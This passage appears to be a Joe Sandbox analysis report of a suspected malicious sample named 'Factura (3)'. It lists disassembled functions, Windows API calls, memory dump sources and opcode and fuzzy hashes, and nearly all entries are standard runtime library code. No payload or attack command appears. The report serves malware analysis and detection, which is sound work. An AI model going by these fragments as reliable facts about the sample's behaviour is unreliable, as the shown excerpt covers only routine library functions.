                                                      • API String ID: 3075750325-2766056989
                                                      • Opcode ID: f4c72cae165faeedf3d4aa73199741d3ffaa5c6b57af870b3040c360871807d5
                                                      • Instruction ID: 9a446b3d9d128a099a67699a27c35247b27597e9c53615fe4de3676683094e51
                                                      • Opcode Fuzzy Hash: f4c72cae165faeedf3d4aa73199741d3ffaa5c6b57af870b3040c360871807d5
                                                      • Instruction Fuzzy Hash: 8812063261DAC591DA74EB56E4943AAF7A1F7C9780F800072EA8D83BA9DF3CD544DB10
                                                      Function 00007FF7340FAFCC Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 81ee503e79cd9d06f6ac34c0c27b23d2bdbaa24f0b3b40a5e112f139e7148bd8
                                                      • Instruction ID: 1e915d5889d917e0a8f99beb02d51b05de9f23e7e6157d73bcfabf24daf2595b
                                                      • Opcode Fuzzy Hash: 81ee503e79cd9d06f6ac34c0c27b23d2bdbaa24f0b3b40a5e112f139e7148bd8
                                                      • Instruction Fuzzy Hash: F7C1D132B0D686A1E668BF5694C02BDA7E0FB80B80FD50171DA4D87395CE7CE845AB20
                                                      Function 00007FF7340ED958 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7340EDC0A,?,?,?,00007FF7340ECA9C,?,?,?,00007FF7340E9509), ref: 00007FF7340ED9DD
                                                      • GetLastError.KERNEL32(?,?,?,00007FF7340EDC0A,?,?,?,00007FF7340ECA9C,?,?,?,00007FF7340E9509), ref: 00007FF7340ED9EB
                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7340EDC0A,?,?,?,00007FF7340ECA9C,?,?,?,00007FF7340E9509), ref: 00007FF7340EDA15
                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7340EDC0A,?,?,?,00007FF7340ECA9C,?,?,?,00007FF7340E9509), ref: 00007FF7340EDA83
                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7340EDC0A,?,?,?,00007FF7340ECA9C,?,?,?,00007FF7340E9509), ref: 00007FF7340EDA8F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                      • String ID: api-ms-
                                                      • API String ID: 2559590344-2084034818
                                                      • Opcode ID: 999db5689f4d99c5d95ed67544fceb35df215e91ca3a674ab7cb3ed5369118bd
                                                      • Instruction ID: 29b4119ee9421748e1b62b1b7e8a13bf1c29313c3e308c0883d3af50353962ca
                                                      • Opcode Fuzzy Hash: 999db5689f4d99c5d95ed67544fceb35df215e91ca3a674ab7cb3ed5369118bd
                                                      • Instruction Fuzzy Hash: 2131C521B1EE06B0EE29AF07A484179A394FF84B64F9D0535DD2D87380EF3CE190A224
                                                      Function 00007FF7340F7D04 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Value$ErrorLast
                                                      • String ID:
                                                      • API String ID: 2506987500-0
                                                      • Opcode ID: a1e4c6b3a0fa9e52562add9bfb766a02b427e70752296194f76d1e817e6380ff
                                                      • Instruction ID: f96ff71affe0f2fb481c4a4dbf59996e72a66306de625dc23c0c5fe12b71981d
                                                      • Opcode Fuzzy Hash: a1e4c6b3a0fa9e52562add9bfb766a02b427e70752296194f76d1e817e6380ff
                                                      • Instruction Fuzzy Hash: E321CF21B0A64262FA9C7F3365D50B9F1E15F887B0FD406B5D93E876C6EF2CB4016621
                                                      Function 00007FF73410829C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                      • String ID: CONOUT$
                                                      • API String ID: 3230265001-3130406586
                                                      • Opcode ID: c7c48c9f329cee50831277793ef47e41c18c615e9af438121ae772ad541a5709
                                                      • Instruction ID: b870a318d6f332029a055c2c85e72d6bcc9a93d753e1c1943b690eb430b51003
                                                      • Opcode Fuzzy Hash: c7c48c9f329cee50831277793ef47e41c18c615e9af438121ae772ad541a5709
                                                      • Instruction Fuzzy Hash: 94118E21A18E4196E758AF47F888329E3A0FB88BE4F940234EA5EC7794DF7CD5048751
                                                      Function 00007FF7340E7350 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiStringWide
                                                      • String ID:
                                                      • API String ID: 2829165498-0
                                                      • Opcode ID: 8f09e05667e55a467be64de7c917014b8b2d6792e95e7af5c5873f19423a4668
                                                      • Instruction ID: f74a02678f46c18946f00969432385ffa543bcf1a22954490a0e77ae2c20d329
                                                      • Opcode Fuzzy Hash: 8f09e05667e55a467be64de7c917014b8b2d6792e95e7af5c5873f19423a4668
                                                      • Instruction Fuzzy Hash: 2981E332708B4692EB28AF26A08036AF6D1FF447A8F940235EA1D87BC8DF7CD4549714
                                                      Function 00007FF7340E5720 Relevance: 9.2, APIs: 6, Instructions: 168COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Fgetc
                                                      • String ID:
                                                      • API String ID: 1720979605-0
                                                      • Opcode ID: 3e2bf9995382065f4948322529ddc5a60683cd7dbd31b5e7fac337e272d39ca3
                                                      • Instruction ID: 21318116e480c300f72a4bf1b6a6a69b5ffedaebb03a43f400ec798884e80b14
                                                      • Opcode Fuzzy Hash: 3e2bf9995382065f4948322529ddc5a60683cd7dbd31b5e7fac337e272d39ca3
                                                      • Instruction Fuzzy Hash: E591642270DA8994DA64EF56E0903BEF7A0FBC1780F844471E6CD83699DE3CD494EB54
                                                      Function 00007FF7340E36D0 Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::EmptyMpunctQueue::StructuredWorkshared_ptrstd::ios_base::width
                                                      • String ID:
                                                      • API String ID: 2515095778-0
                                                      • Opcode ID: f58fba2569b54437669825e63150ae70c4a53890a28a4fb230e01e746ff9f728
                                                      • Instruction ID: 1b66db024ba3249f623e0f1a5c5dce9e06e9cf29cd4efc57766dbd74f4eb051d
                                                      • Opcode Fuzzy Hash: f58fba2569b54437669825e63150ae70c4a53890a28a4fb230e01e746ff9f728
                                                      • Instruction Fuzzy Hash: 7881D732618AC995DA74EB12E4903EAE761FBC8780F800072EACD83B99DF3CD555DB50
                                                      Function 00007FF7340E0C60 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 326COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Mpunct$ctypestd::ios_base::width
                                                      • String ID: @
                                                      • API String ID: 3075750325-2766056989
                                                      • Opcode ID: ef834a0c7441b900ad624ed02ee982a973de64441cfa549280963f0c2916aa15
                                                      • Instruction ID: 04aeeaf81f5cba3042a9deee23f3beb792314e7464380738a5136c588b5d961e
                                                      • Opcode Fuzzy Hash: ef834a0c7441b900ad624ed02ee982a973de64441cfa549280963f0c2916aa15
                                                      • Instruction Fuzzy Hash: E3F1283260CAC994DA74AB16E4943EEE361F7C8780F800472EA8D83B69DF6CD594DB50
                                                      Function 00007FF7340EA740 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 320COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 3523768491-393685449
                                                      • Opcode ID: c0cddb45a2abbcc732e9d66968630fcf0b47503d70b793808c6905956b72cee3
                                                      • Instruction ID: b0408e54bdfbf0b52dbcfdc7a33fc0611d71c539476f400d55e80db69fd4b22e
                                                      • Opcode Fuzzy Hash: c0cddb45a2abbcc732e9d66968630fcf0b47503d70b793808c6905956b72cee3
                                                      • Instruction Fuzzy Hash: AEE1F432A08B869AE714EF26D4C03ACB7A0FB44748F544176DE8D97656CF38E0D5EB14
                                                      Function 00007FF7340DC940 Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_taskGetfacet__int64std::locale::_
                                                      • String ID:
                                                      • API String ID: 2644824941-0
                                                      • Opcode ID: aa543303047a5c3314217b12b730024ae9737a0205f84f9dac83058a3999850c
                                                      • Instruction ID: 0a7791aaea2727044a016f7ee65c436bcf27e8b0b72e26f2452fd861f4a0a561
                                                      • Opcode Fuzzy Hash: aa543303047a5c3314217b12b730024ae9737a0205f84f9dac83058a3999850c
                                                      • Instruction Fuzzy Hash: D0216C22A1CE8591DA14BF16F4C026EF3A0FBC57A4F901131F68E83BA9DE2CC1449B10
                                                      Function 00007FF7340DCA50 Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_taskGetfacet__int64std::locale::_
                                                      • String ID:
                                                      • API String ID: 2644824941-0
                                                      • Opcode ID: 1143b29f987bd34690dbc2be759c3df89f5d062c7dea06a6716a1daa17ab40e5
                                                      • Instruction ID: cddc15f4abe98c67a9ec865f78f5b9fb062b08f8adb26f74070613fa54a7fccc
                                                      • Opcode Fuzzy Hash: 1143b29f987bd34690dbc2be759c3df89f5d062c7dea06a6716a1daa17ab40e5
                                                      • Instruction Fuzzy Hash: 7F212C2261CE8591DA54AF16F4C026EF3A0FBC57A4F901271F68E83BB9DE2CD5549B10
                                                      Function 00007FF7340DCB60 Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_taskGetfacet__int64std::locale::_
                                                      • String ID:
                                                      • API String ID: 2644824941-0
                                                      • Opcode ID: a63ba4a3a04bf53c76ded1a94b5bc59be979fc8c1237f4d559dee9d770f00811
                                                      • Instruction ID: ef9f67219136daceec3c9c9fd58dbe9f69fba3aa222e21a5c1f7f3d01b3cb44c
                                                      • Opcode Fuzzy Hash: a63ba4a3a04bf53c76ded1a94b5bc59be979fc8c1237f4d559dee9d770f00811
                                                      • Instruction Fuzzy Hash: 05214C2261CE8991DA54AF16F4C026EF7A0FBC57A0F901571F68E83BA9DE2CD1549B10
                                                      Function 00007FF7340DCC70 Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_taskGetfacet__int64std::locale::_
                                                      • String ID:
                                                      • API String ID: 2644824941-0
                                                      • Opcode ID: b5096ab7613cdef029ffb58c6c8f6feef40c555cefc4722ccf28266a2e72356f
                                                      • Instruction ID: 2bbc5483810bfe6770251a94b483be8714c424759f7d7c1407f35ad3b8544e62
                                                      • Opcode Fuzzy Hash: b5096ab7613cdef029ffb58c6c8f6feef40c555cefc4722ccf28266a2e72356f
                                                      • Instruction Fuzzy Hash: F0214C2262CE8591DA14AF16F4C026EF7A0FBC57A0F901571F68E83BB9DE2CD194DB10
                                                      Function 00007FF7340F7E7C Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,00007FF7340F3521,?,?,?,?,00007FF7340F8110), ref: 00007FF7340F7E8B
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7340F3521,?,?,?,?,00007FF7340F8110), ref: 00007FF7340F7EC1
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7340F3521,?,?,?,?,00007FF7340F8110), ref: 00007FF7340F7EEE
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7340F3521,?,?,?,?,00007FF7340F8110), ref: 00007FF7340F7EFF
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7340F3521,?,?,?,?,00007FF7340F8110), ref: 00007FF7340F7F10
                                                      • SetLastError.KERNEL32(?,?,?,00007FF7340F3521,?,?,?,?,00007FF7340F8110), ref: 00007FF7340F7F2B
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Value$ErrorLast
                                                      • String ID:
                                                      • API String ID: 2506987500-0
                                                      • Opcode ID: d25e2a428f81a1e63488b58c64afde6197c83e7fae085f9ee0349d737f9f3be4
                                                      • Instruction ID: 0d21e02eb59b4287a67e8e12480900d990aa6cc00fb66a7d217498da5b4221be
                                                      • Opcode Fuzzy Hash: d25e2a428f81a1e63488b58c64afde6197c83e7fae085f9ee0349d737f9f3be4
                                                      • Instruction Fuzzy Hash: 7811BE21B0A602A2FA5CBF3365D10B9F1C15F487B0FD406B5E82E876C6EF2CB411A631
                                                      Function 00007FF7340F4634 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 245f88685664180003ee324a8f11b9bf22120ac7b3f7975ca7d860f9767cd801
                                                      • Instruction ID: d89f61cafac6269f5764e86ec616de44159d43e9618a1acfeb25416757c47492
                                                      • Opcode Fuzzy Hash: 245f88685664180003ee324a8f11b9bf22120ac7b3f7975ca7d860f9767cd801
                                                      • Instruction Fuzzy Hash: F6F0C861B09E02A1FA1CAF26F4C8339E360AF54760F940235CA6D855E4DF3CD044DB21
                                                      Function 00007FF7340E9B40 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: AdjustPointer
                                                      • String ID:
                                                      • API String ID: 1740715915-0
                                                      • Opcode ID: d4445c26989423fbbb70a8eafd3c38cfcd01928838610fbd60e46ebe8693f3f8
                                                      • Instruction ID: 0afcef29c1bda58b185c871540cf627a89385f3a5b1de87dc86b8bba47a158c2
                                                      • Opcode Fuzzy Hash: d4445c26989423fbbb70a8eafd3c38cfcd01928838610fbd60e46ebe8693f3f8
                                                      • Instruction Fuzzy Hash: 46B1DB61B0DE5AA1EA6DFF1390C0578E290AF44B80F8544B5CECD87795DE3CE4E1AB24
                                                      Function 00007FF7340FCF90 Relevance: 7.7, APIs: 5, Instructions: 196COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID:
                                                      • API String ID: 1156100317-0
                                                      • Opcode ID: 531ec001749944e30a9d6009bf9ae8df4748624afa1a8fb5c67025f4f1a1f96a
